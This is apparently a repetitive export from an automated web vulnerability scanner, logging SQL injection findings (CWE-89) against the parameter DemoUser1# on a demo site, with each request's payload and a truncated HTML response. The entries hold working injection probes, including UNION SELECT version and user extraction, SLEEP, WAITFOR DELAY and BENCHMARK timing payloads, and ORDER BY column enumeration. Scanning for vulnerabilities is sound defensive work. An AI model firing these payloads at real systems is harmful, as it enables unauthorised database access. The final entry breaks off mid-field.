href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1425\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 16\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1426\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 13--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1427\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" or \"\" \"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1428\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \");waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1429Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1430\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1431\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AS INJECTX WHERE 1=1 AND 1=0-\n-\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1432\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1433\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1434\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1435\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1436\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1437\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \"^\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1438\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 17\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1439\nScan SQL Injection\nSeverity 